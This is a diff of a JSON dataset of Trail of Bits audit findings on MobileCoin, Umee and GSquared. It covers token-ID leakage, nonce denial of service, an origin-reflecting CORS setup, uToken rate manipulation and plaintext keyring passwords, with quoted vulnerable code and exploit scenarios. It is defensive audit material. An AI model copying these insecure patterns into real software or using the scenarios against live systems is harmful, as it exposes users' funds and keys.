entire computation . Write negative tests with edge-case values to ensure that the methods handle errors gracefully.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "2. MobileCoin Foundation could infer token IDs in certain scenarios ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "The MobileCoin Foundation is the recipient of all transaction fees and, in certain scenarios, could infer the token ID used in one of multiple transactions included in a block. MCIP-0025 introduced the concept of condential token IDs. The rationale behind the proposal is to allow the MobileCoin network to support tokens other than MOB (MobileCoins native token) in the future. Doing so requires not only that these tokens be unequivocally identiable but also that transactions involving any token, MOB or otherwise, have the same condentiality properties. Before the introduction of the condential tokens feature, all transaction fees were aggregated by the enclave, which created a single transaction fee output per block; however, the same approach applied to a system that supports transfers of tokens other than MOB could introduce information leakage risks. For example, if two users submit two transactions with the same token ID, there would be a single transaction fee output, and therefore, both users would know that they transacted with the same token. To prevent such a leak of information, MCIP-0025 proposes the following: The number of transaction fee outputs on a block should always equal the minimum value between the number of token IDs and the number of transactions in that block (e.g., num_tx_fee_out = min(num_token_ids, num_transactions)). This essentially means that a block with a single transaction will still have a single transaction fee output, but a block with multiple transactions with the same token ID will have multiple transaction fee outputs, one with the aggregated fee and the others with a zero-value fee. Finally, it is worth mentioning that transaction fees are not paid in MOB but in the token that is being transacted; this creates a better user experience, as users do not need to own MOB to send tokens to other people. While this proposal does indeed preserve the condentiality requirement, it falls short in one respect: the receiver of all transaction fees in the MobileCoin network is the MobileCoin Foundation, meaning that it will always know the token ID corresponding to a transaction fee output. Therefore, if only a single token is used in a block, the foundation will know the token ID used by all of the transactions in that block. Exploit Scenario Alice and Bob use the MobileCoin network to make payments between them. They send each other multiple payments, using the same token, and their transactions are included in a single block. Eve, who has access to the MobileCoin Foundations viewing key, is able to decrypt the transaction fee outputs corresponding to that block and, because no other token was used inside the block, is able to infer the token that Alice and Bob used to make the payments. Recommendations Short term, document the fact that transaction token IDs are visible to the MobileCoin Foundation. Transparency on this issue will help users understand the information that is visible by some parties. Additionally, consider implementing the following alternative designs: Require that all transaction fees be paid in MOB. This solution would result in a degraded user experience compared to the current design; however, it would address the issue at hand. Aggregate fee outputs across multiple blocks. This solution would achieve only probabilistic condentiality of information because if all those blocks transact in the same token, the foundation would still be able to infer the ID. Long term, document the trade-os between allowing users to pay fees in the tokens they transact with and restricting fee payments to only MOB, and document how these trade-os could aect the condentiality of the system.", + "title": "17. Architecture-dependent code ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In the Go programming language, the bit size of an int variable depends on the platform on which the code is executed. On a 32-bit platform, it will be 32 bits, and on a 64-bit platform, 64 bits. Validators running on dierent architectures will therefore interpret int types dierently, which may lead to transaction-parsing discrepancies and ultimately to a consensus failure or chain split. One use of the int type is shown in gure 17.1. Because casting the maxValidators variable to the int type should not cause it to exceed the maximum int value for a 32-bit platform, we set the severity of this nding to informational. for ; iterator.Valid() && i < int (maxValidators) ; iterator.Next() { Figure 17.1: An architecture-dependent loop condition in the EndBlocker method ( umee/x/oracle/abci.go#34 ) Exploit Scenario The maxValidators variable (a variable of the uint32 type) is set to its maximum value, 4,294,967,296. During the execution of the x/oracle modules EndBlocker method, some validators cast the variable to a negative number, while others cast it to a large positive integer. The chain then stops working because the validators cannot reach a consensus. Recommendations Short term, ensure that architecture-dependent types are not used in the codebase . Long term, test the system with parameters set to various edge-case values, including the maximum and minimum values of dierent integer types. Test the system on all common architectures (e.g., architectures with 32- and 64-bit CPUs), or develop documentation specifying the architecture(s) used in testing.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2642,9 +5390,9 @@ ] }, { - "title": "3. Token IDs are protected only by SGX ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Token IDs are intended to be condential. However, they are operated on within an SGX enclave. This is an apparent departure from MobileCoins previous approach of using SGX as an additional security mechanism, not a primary one. Previously, most condential information in MobileCoin was protected by SGX and another security mechanism. Examples include the following: A transactions senders, recipients, and amounts are protected by SGX and ring signatures. The transactions a user interacts with through Fog are protected by both SGX and oblivious RAM. However, token IDs are protected by SGX alone. (An example in which a token ID is operated on within an enclave appears in gure 3.1.) Thus, the incorporation of condential tokens seems to represent a shift in MobileCoins security posture. let token_id = TokenId::from(tx.prefix.fee_token_id); let minimum_fee = ct_min_fees .get(&token_id) .ok_or(TransactionValidationError::TokenNotYetConfigured)?; Figure 3.1: consensus/enclave/impl/src/lib.rs#L239-L243 Exploit Scenario Mallory learns of a vulnerability that allows her to see inside of an SGX enclave. Mallory uses the vulnerability to observe the token IDs used in transactions in a MobileCoin enclave that she runs. Recommendations Short term, document the fact that token IDs are not oered the same level of security as other aspects of MobileCoin. This will help set users expectations regarding the condentiality of their information (i.e., whether it could be revealed to an attacker). Long term, continue to investigate solutions to the security problems surrounding the condential tokens feature. A solution that does not reveal token IDs to the enclave could exist.", + "title": "18. Weak cross-origin resource sharing settings ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In the price-feeder s cross-origin resource sharing (CORS) settings, most of the same-origin policy protections are disabled. This increases the severity of vulnerabilities like cross-site request forgery. v1Router.Methods( \"OPTIONS\" ).HandlerFunc( func (w http.ResponseWriter, r *http.Request) { w.Header().Set( \"Access-Control-Allow-Origin\" , r.Header.Get( \"Origin\" )) w.Header().Set( \"Access-Control-Allow-Methods\" , \"GET, PUT, POST, DELETE, OPTIONS\" ) w.Header().Set( \"Access-Control-Allow-Headers\" , \"Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With\" ) w.Header().Set( \"Access-Control-Allow-Credentials\" , \"true\" ) w.WriteHeader(http.StatusOK) }) Figure 18.1: The current CORS conguration ( umee/price-feeder/router/v1/router.go#4652 ) We set the severity of this nding to informational because no sensitive endpoints are exposed by the price-feeder router. Exploit Scenario A new endpoint is added to the price-feeder API. It accepts PUT requests that can update the tools provider list. An attacker uses phishing to lure the price-feeder s operator to a malicious website. The website triggers an HTTP PUT request to the API, changing the provider list to a list in which all addresses are controlled by the attacker. The attacker then repeats the attack against most of the validators, manipulates on-chain prices, and drains the systems funds. Recommendations Short term, use strong default values in the CORS settings . Long term, ensure that APIs exposed by the price-feeder have proper protections against web vulnerabilities.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2652,59 +5400,59 @@ ] }, { - "title": "4. Nonces are not stored per token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Mint and mint conguration transaction nonces are not distinguished by the tokens with which they are associated. Malicious minters or governors could use this fact to conduct denial-of-service attacks against other minters and governors. The relevant code appears in gures 4.1 and 4.2. For each type of transaction, nonces are inserted into a seen_nonces set without regard to the token indicated in the transaction. let mut seen_nonces = BTreeSet::default(); let mut validated_txs = Vec::with_capacity(mint_config_txs.len()); for tx in mint_config_txs { // Ensure all nonces are unique. if !seen_nonces.insert(tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintConfigTx nonce: {:?}\", tx.prefix.nonce ))); } Figure 4.1: consensus/enclave/impl/src/lib.rs#L342-L352 let mut mint_txs = Vec::with_capacity(mint_txs_with_config.len()); let mut seen_nonces = BTreeSet::default(); for (mint_tx, mint_config_tx, mint_config) in mint_txs_with_config { // The nonce should be unique. if !seen_nonces.insert(mint_tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintTx nonce: {:?}\", mint_tx.prefix.nonce ))); } Figure 4.2: consensus/enclave/impl/src/lib.rs#L384-L393 Note that the described attack could be made worse by how nonces are intended to be used. The following passage from the white paper suggests that nonces are generated deterministically from public data. Generating nonces in this way could make them easy for an attacker to predict. When submitting a MintTx, we include a nonce to protect against replay attacks, and a tombstone block to prevent the transaction from being nominated indenitely, and these are committed to the chain. (For example, in a bridge application, this nonce may be derived from records on the source chain, to ensure that each deposit on the source chain leads to at most one mint.) Exploit Scenario Mallory (a minter) learns that Alice (another minter) intends to submit a mint transaction with a particular nonce. Mallory submits a mint transaction with that nonce rst, making Alices invalid. Recommendations Short term, store nonces per token, instead of all together. Doing so will prevent the denial-of-service attack described above. Long term, when adding new data to blocks or to the blockchain conguration, carefully consider whether it should be stored per token. Doing so could help to prevent denial-of-service attacks.", + "title": "19. price-feeder is at risk of rate limiting by public APIs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Price providers used by the price-feeder tool may enforce limits on the number of requests served to them. After reaching a limit, the tool should take certain actions to avoid a prolonged or even permanent ban. Moreover, using API keys or non-HTTP access channels would decrease the price-feeder s chance of being rate limited. Every API has its own rules, which should be reviewed and respected. The rules of three APIs are summarized below. Binance has hard, machine-learning, and web application rewall limits . Users are required to stop sending requests if they receive a 429 HTTP response code . Kraken implements rate limiting based on call counters and recommends using the WebSockets API instead of the REST API. Huopi restricts the number of requests to 10 per second and recommends using an API key. Exploit Scenario A price-feeder exceeds the limits of the Binance API. It is rate limited and receives a 429 HTTP response code from the API. The tool does not notice the response code and continues to spam the API. As a result, it receives a permanent ban. The validator using the price-feeder then starts reporting imprecise exchange rates and gets slashed. Recommendations Short term, review the requirements and recommendations of all APIs supported by the system . Enforce their requirements in a user-friendly manner; for example, allow users to set and rotate API keys, delay HTTP requests so that the price-feeder will avoid rate limiting but still report accurate prices, and log informative error messages upon reaching rate limits. Long term, perform stress-testing to ensure that the implemented safety checks work properly and are robust.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "5. Clients have no option for verifying blockchain conguration ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Clients have no way to verify whether the MobileCoin node they connect to is using the correct blockchain conguration. This exposes users to attacks, as detailed in the white paper: Similarly to how the nodes ensure that they are similarly congured during attestation, (by mixing a hash of their conguration into the responder id used during attestation), the peer- to-node attestation channels could also do this, so that users can fail to attest immediately if malicious manipulation of conguration has occurred. The problem with this approach is that the users have no particularly good source of truth around the correct runtime conguration of the services. The problem that users have no particularly good source of truth could be solved by publishing the latest blockchain conguration via a separate channel (e.g., a publicly accessible server). Furthermore, allowing users to opt in to such additional checks would provide additional security to users who desire it. Exploit Scenario Alice falls victim to the attack described in the white paper. The attack would have been thwarted had Alice known that the node she connected to was not using the correct blockchain conguration. Recommendations Short term, make the current blockchain conguration publicly available, and allow nodes to attest to clients using their conguration. Doing so will help security-conscious users to better protect themselves. Long term, avoid withholding data from clients during attestation. Adopt a general principle that if data should be included in node-to-node attestation, then it should be included in node-to-client attestation as well. Doing so will help to ensure the security of users.", + "title": "20. Lack of prioritization of oracle messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Oracle messages are not prioritized over other transactions for inclusion in a block. If the network is highly congested, the messages may not be included in a block. Although the Umee system could increase the fee charged for including an oracle message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario The Umee network is congested. Validators send their exchange rate votes, but the exchange rates are not included in a block. An attacker then exploits the situation by draining the network of its tokens. Recommendations Short term, use a custom CheckTx method to prioritize oracle messages . This will help prevent validators votes from being left out of a block and ignored by an oracle. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "6. Condential tokens cannot support frequent price swings ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "The method for determining tokens minimum fees has limited applicability. In particular, it cannot support tokens whose prices change frequently. In principle, a tokens minimum fee should be comparable in value to the MOB minimum fee. Thus, if a tokens price increases relative to the price of MOB, the tokens minimum fee should decrease. Similarly, if a tokens price decreases relative to the price of MOB, the tokens minimum fee should increase. However, an enclave sets its fee map from the blockchain conguration during initialization (gure 6.1) and does not change the fee map thereafter. Thus, the enclave would seem to have to be restarted if its blockchain conguration and fee map were to change. This fact implies that the current setup cannot support tokens whose prices shift frequently. fn enclave_init( &self, peer_self_id: &ResponderId, client_self_id: &ResponderId, sealed_key: &Option, blockchain_config: BlockchainConfig, ) -> Result<(SealedBlockSigningKey, Vec)> { // Check that fee map is actually well formed FeeMap::is_valid_map(blockchain_config.fee_map.as_ref()).map_err(Error::FeeMap)?; // Validate governors signature. if !blockchain_config.governors_map.is_empty() { let signature = blockchain_config .governors_signature .ok_or(Error::MissingGovernorsSignature)?; let minting_trust_root_public_key = Ed25519Public::try_from(&MINTING_TRUST_ROOT__KEY[..]) .map_err(Error::ParseMintingTrustRootPublicKey)?; minting_trust_root_public_key .verify_governors_map(&blockchain_config.governors_map, &signature) .map_err(|_| Error::InvalidGovernorsSignature)?; } self.ct_min_fee_map .set(Box::new( blockchain_config.fee_map.as_ref().iter().collect(), )) .expect(\"enclave was already initialized\"); Figure 6.1: consensus/enclave/impl/src/lib.rs#L454-L483 Exploit Scenario MobileCoin integrates token T. The value of T decreases, but the minimum fee remains the same. Users pay the minimum fee, resulting in lost income to the MobileCoin Foundation. Recommendations Short term, accept only tokens with a history of price stability. Doing so will ensure that the new features are used only with tokens that can be supported. Long term, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "title": "21. Risk of token/uToken exchange rate manipulation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Umee specication states that the token/uToken exchange rate can be aected only by the accrual of interest (not by Lend , Withdraw , Borrow , Repay , or Liquidate transactions). However, this invariant can be broken: When tokens are burned or minted through an Inter-Blockchain Communication (IBC) transfer, the ibc-go library accesses the x/bank modules keeper interface, which changes the total token supply (as shown in gure 21.2). This behavior is mentioned in a comment shown in gure 22.1. Sending tokens directly to the module through an x/bank message also aects the exchange rate. func (k Keeper) TotalUTokenSupply(ctx sdk.Context, uTokenDenom string ) sdk.Coin { if k.IsAcceptedUToken(ctx, uTokenDenom) { return k.bankKeeper.GetSupply(ctx, uTokenDenom) // TODO - Question: Does bank module still track balances sent (locked) via IBC? // If it doesn't then the balance returned here would decrease when the tokens // are sent off, which is not what we want. In that case, the keeper should keep // an sdk.Int total supply for each uToken type. } return sdk.NewCoin(uTokenDenom, sdk.ZeroInt()) } Figure 21.1: The method vulnerable to unexpected IBC transfers ( umee/x/leverage/keeper/keeper.go#6573 ) if err := k.bankKeeper.BurnCoins( ctx, types.ModuleName, sdk.NewCoins(token), Figure 21.2: The IBC library code that accesses the x/bank modules keeper interface ( ibc-go/modules/apps/transfer/keeper/relay.go#136137 ) Exploit Scenario An attacker with two Umee accounts lends tokens through the system and receives a commensurate number of uTokens. He temporarily sends the uTokens from one of the accounts to another chain (chain B), decreasing the total supply and increasing the token/uToken exchange rate. The attacker uses the second account to withdraw more tokens than he otherwise could and then sends uTokens back from chain B to the rst account. In this way, he drains funds from the module. Recommendations Short term, ensure that the TotalUTokenSupply method accounts for IBC transfers. Use the Cosmos SDKs blocklisting feature to disable direct transfers to the leverage and oracle modules. Consider setting DefaultSendEnabled to false and explicitly enabling certain tokens transfer capabilities. Long term, follow GitHub issues #10386 and #5931 , which concern functionalities that may enable module developers to make token accounting more reliable. Additionally, ensure that the system accounts for ination .", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "7. Overow handling could allow recovery of transaction token ID ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "The systems fee calculation could overow a u64 value. When this occurs, the fee is divided up into multiple smaller fees, each tting into a u64 value. Under certain conditions, this behavior could be abused to reveal whether a token ID is used in a block. The relevant code appears in gure 7.1. The hypothetical attack is described in the exploit scenario below. loop { let output_fee = min(total_fee, u64::MAX as u128) as u64; outputs.push(mint_output( config.block_version, &fee_recipient, FEES_OUTPUT_PRIVATE_KEY_DOMAIN_TAG.as_bytes(), parent_block, &transactions, Amount { value: output_fee, token_id, }, outputs.len(), )); total_fee -= output_fee as u128; if total_fee == 0 { break; } } Figure 7.1: consensus/enclave/impl/src/lib.rs#L855-L873 Exploit Scenario Mallory is a (malicious) minter of token T. Suppose B is a recently minted block whose total number of fee outputs is equal to the number of tokens, which is less than the number of transactions in B. Further suppose that Mallory wishes to determine whether B contains a transaction involving T. Mallory does the following: 1. She puts her node into its state just prior to the minting of B. 2. She mints to herself a quantity of T worth u64::MAX / min_fee * min_fee. Call this quantity F. 3. She submits to her node a transaction with a fee of F. 4. She allows the block to be minted. 5. She observes the number of fee outputs in the modied block, B: a. b. If B does not contain a transaction involving T, then B contains a fee output for T equal to zero, and B contains a fee output for T equal to F. If B does contain a transaction involving T, then B contains a fee output for T equal to at least min_fee, and B contains two fee outputs for T, one of which is equal to u64::MAX. Thus, by observing the number of outputs in B, Mallory can determine whether B contains a transaction involving T. Recommendations Short term, require the total supply of all incorporated tokens not to exceed a u64 value. Doing so will eliminate the possibility of overow and prevent the attack described above. Long term, consider incorporating randomness into the number of fee outputs generated. This could provide an alternative means of preventing the attack in a way that still allows for overow. Alternatively, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "title": "22. Collateral dust prevents the designation of defaulted loans as bad debt ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "An accounts debt is considered bad debt only if its collateral balance drops to zero. The debt is then repaid from the modules reserves. However, users may liquidate the majority of an accounts assets but leave a small amount of debt unpaid. In that case, the transaction fees may make liquidation of the remaining collateral unprotable. As a result, the bad debt will not be paid from the module's reserves and will linger in the system indenitely. Exploit Scenario A large loan taken out by a user becomes highly undercollateralized. An attacker liquidates most of the users collateral to repay the loan but leaves a very small amount of the collateral unliquidated. As a result, the loan is not considered bad debt and is not paid from the reserves. The rest of the tokens borrowed by the user remain out of circulation, preventing other users from withdrawing their funds. Recommendations Short term, establish a lower limit on the amount of collateral that must be liquidated in one transaction to prevent accounts from holding dust collateral. Long term, establish a lower limit on the number of tokens to be used in every system operation. That way, even if the systems economic incentives are lacking, the operations will not result in dust tokens.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "1. Unbounded loop can cause denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Under certain conditions, the withdrawal code will loop, permanently blocking users from getting their funds. The beforeWithdraw function runs before any withdrawal to ensure that the vault has sucient assets. If the vault reserves are insucient to cover the withdrawal, it loops over each strategy, incrementing the _ strategyId pointer value with each iteration, and withdrawing assets to cover the withdrawal amount. 643 644 645 646 { 647 function beforeWithdraw ( uint256 _assets , ERC20 _token) internal returns ( uint256 ) // If reserves dont cover the withdrawal, start withdrawing from strategies 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 if (_assets > _token.balanceOf( address ( this ))) { uint48 _strategyId = strategyQueue.head; while ( true ) { address _strategy = nodes[_strategyId].strategy; uint256 vaultBalance = _token.balanceOf( address ( this )); // break if we have withdrawn all we need if (_assets <= vaultBalance) break ; uint256 amountNeeded = _assets - vaultBalance; StrategyParams storage _strategyData = strategies[_strategy]; amountNeeded = Math.min(amountNeeded, _strategyData.totalDebt); // If nothing is needed or strategy has no assets, continue if (amountNeeded == 0 ) { continue ; } Figure 1.1: The beforeWithdraw function in GVault.sol#L643-662 However, during an iteration, if the vault raises enough assets that the amount needed by the vault becomes zero or that the current strategy no longer has assets, the loop would keep using the same strategyId until the transaction runs out of gas and fails, blocking the withdrawal. Exploit Scenario Alice tries to withdraw funds from the protocol. The contract may be in a state that sets the conditions for the internal loop to run indenitely, resulting in the waste of all sent gas, the failure of the transaction, and blocking all withdrawal requests. Recommendations Short term, add logic to i ncrement the _strategyId variable to point to the next strategy in the StrategyQueue before the continue statement. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "title": "23. Users can borrow assets that they are actively using as collateral ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "When a user calls the BorrowAsset function to take out a loan, the function does not check whether the user is borrowing the same type of asset as the collateral he or she supplied. In other words, a user can borrow tokens from the collateral that the user supplied. The Umee system prohibits users from borrowing assets worth more than the collateral they have provided, so a user cannot directly exploit this issue to borrow more funds than the user should be able to borrow. However, a user can borrow the vast majority of his or her collateral to continue accumulating lending rewards while largely avoiding the risks of providing collateral. Exploit Scenario An attacker provides 10 ATOMs to the protocol as collateral and then immediately borrows 9 ATOMs. He continues to earn lending rewards on his collateral but retains the use of most of the collateral. The attacker, through ash loans, could also resupply the borrowed amount as collateral and then immediately take out another loan, repeating the process until the amount he had borrowed asymptotically approached the amount of liquidity he had provided. Recommendations Short term, determine whether borrowers ability to borrow their own collateral is an issue. (Note that Compounds front end disallows such operations, but its actual contracts do not.) If it is, have BorrowAsset check whether a user is attempting to borrow the same asset that he or she staked as collateral and block the operation if so. Alternatively, ensure that borrow fees are greater than prots from lending. Long term, assess whether the liquidity-mining incentives accomplish their intended purpose, and ensure that the lending incentives and borrowing costs work well together.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: Low" ] }, { - "title": "2. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The setOwner() function is used to change the owner of the PnLFixedRate contract. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function setOwner ( address _owner ) external { if ( msg.sender != owner) revert PnLErrors.NotOwner(); address previous_owner = msg.sender ; owner = _owner; emit LogOwnershipTransferred(previous_owner, _owner); 56 57 58 59 60 61 62 } Figure 2.1: contracts/pnl/PnLFixedRate:56-62 This issue can also be found in the following locations: contracts/pnl/PnL.sol:36-42 contracts/strategy/ConvexStrategy.sol:447-453 contracts/strategy/keeper/GStrategyGuard.sol:92-97 contracts/strategy/stop-loss/StopLossLogic.sol:73-78 Exploit Scenario The owner of the PnLFixedRate contract is a governance-controlled multisignature wallet. The community agrees to change the owner of the strategy, but the wrong address is mistakenly provided to its call to setOwner , permanently misconguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, review how critical operations are implemented across the codebase to make sure they are not error-prone.", + "title": "24. Providing additional collateral may be detrimental to borrowers in default ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "When a user who is in default on a loan deposits additional collateral, the collateral will be immediately liquidable. This may be surprising to users and may aect their satisfaction with the system. Exploit Scenario A user funds a loan and plans to use the coins he deposited as the collateral on a new loan. However, the user does not realize that he defaulted on a previous loan. As a result, bots instantly liquidate the new collateral he provided. Recommendations Short term, if a user is in default on a loan, consider blocking the user from calling the LendAsset or SetCollateralSetting function with an amount of collateral insucient to collateralize the defaulted position . Alternatively, document the risks associated with calling these functions when a user has defaulted on a loan. Long term, ensure that users cannot incur unexpected nancial damage, or document the nancial risks that users face.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2712,19 +5460,19 @@ ] }, { - "title": "3. Non-zero token balances in the GRouter can be stolen ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "A non-zero balance of 3CRV, DAI, USDC, or USDT in the router contract can be stolen by an attacker. The GRouter contract is the entrypoint for deposits into a tranche and withdrawals out of a tranche. A deposit involves depositing a given number of a supported stablecoin (USDC, DAI, or USDT); converting the deposit, through a series of operations, into G3CRV, the protocols ERC4626-compatible vault token; and depositing the G3CRV into a tranche. Similarly, for withdrawals, the user burns their G3CRV that was in the tranche and, after a series of operations, receives back some amount of a supported stablecoin (gure 3.1). ERC20( address (tranche.getTrancheToken(_tranche))).safeTransferFrom( ); // withdraw from tranche // index is zero for ETH mainnet as their is just one yield token // returns usd value of withdrawal ( uint256 vaultTokenBalance , ) = tranche.withdraw( function withdrawFromTrancheForCaller ( msg.sender , address ( this ), _amount uint256 _amount , uint256 _token_index , bool _tranche , uint256 _minAmount 421 422 423 424 425 426 ) internal returns ( uint256 amount ) { 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 _amount, 0 , _tranche, address ( this ) vaultTokenBalance, address ( this ), address ( this ) ); ); // withdraw underlying from GVault uint256 underlying = vaultToken.redeem( 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 } // remove liquidity from 3crv to get desired stable from curve threePool.remove_liquidity_one_coin( underlying, int128 ( uint128 (_token_index)), //value should always be 0,1,2 0 ); ERC20 stableToken = ERC20(routerOracle.getToken(_token_index)); amount = stableToken.balanceOf( address ( this )); if (amount < _minAmount) { revert Errors.LTMinAmountExpected(); } // send stable to user stableToken.safeTransfer( msg.sender , amount); emit LogWithdrawal( msg.sender , _amount, _token_index, _tranche, amount); Figure 3.1: The withdrawFromTrancheForCaller function in GRouter.sol#L421-468 However, notice that during withdrawals the amount of stableTokens that will be transferred back to the user is a function of the current stableToken balance of the contract (see the highlighted line in gure 3.1). In the expected case, the balance should be only the tokens received from the threePool.remove_liquidity_one_coin swap (see L450 in gure 3.1). However, a non-zero balance could also occur if a user airdrops some tokens or they transfer tokens by mistake instead of calling the expected deposit or withdraw functions. As long as the attacker has at least 1 wei of G3CRV to burn, they are capable of withdrawing the whole balance of stableToken from the contract, regardless of how much was received as part of the threePool swap. A similar situation can happen with deposits. A non-zero balance of G3CRV can be stolen as long as the attacker has at least 1 wei of either DAI, USDC, or USDT. Exploit Scenario Alice mistakenly sends a large amount of DAI to the GRouter contract instead of calling the deposit function. Eve notices that the GRouter contract has a non-zero balance of DAI and calls withdraw with a negligible balance of G3CRV. Eve is able to steal Alice's DAI at a very small cost. Recommendations Short term, consider using the dierence between the contracts pre- and post-balance of stableToken for withdrawals, and depositAmount for deposits, in order to ensure that only the newly received tokens are used for the operations. Long term, create an external skim function that can be used to skim any excess tokens in the contract. Additionally, ensure that the user documentation highlights that users should not transfer tokens directly to the GRouter and should instead use the web interface or call the deposit and withdraw functions. Finally, ensure that token airdrops or unexpected transfers can only benet the protocol.", + "title": "25. Insecure storage of price-feeder keyring passwords ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Users can store oracle keyring passwords in the price-feeder conguration le. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the conguration le has overly broad permissions (like those shown in gure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (gure 25.2), which is a safer approach. Moreover, neither source provides information on dierent keyring back ends, and the example price-feeder conguration uses the \"test\" back end . An attacker with access to the conguration le on a users system, or to a backup of the conguration le, could steal the users keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwx rwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with addressA4F324A31DECC0172A83E57A3625AF4B89A91F1Fnot found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the conguration le used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder conguration le, which has been miscongured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the conguration le. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it nds that a private key le has overly broad permissions. Document the risks associated with storing a keyring password in the conguration le. Improve the price-feeder s keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about dierent keyring back ends and the addition of keyring entries, among other concepts. 26. Insu\u0000cient validation of genesis parameters Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-UMEE-26 Target: Genesis parameters", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "4. Uninformative implementation of maxDeposit and maxMint from EIP-4626 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The GVault implementation of EIP-4626 is uninformative for maxDeposit and maxMint, as they return only xed, extreme values. EIP-4626 is a standard to implement tokenized vaults. In particular, the following is specied: maxDeposit : MUST factor in both global and user-specic limits, like if deposits are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. maxMint : MUST factor in both global and user-specic limits, like if mints are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. The current implementation of maxDeposit and maxMint in the GVault contract directly return the maximum value of the uint256 type: /// @notice The maximum amount a user 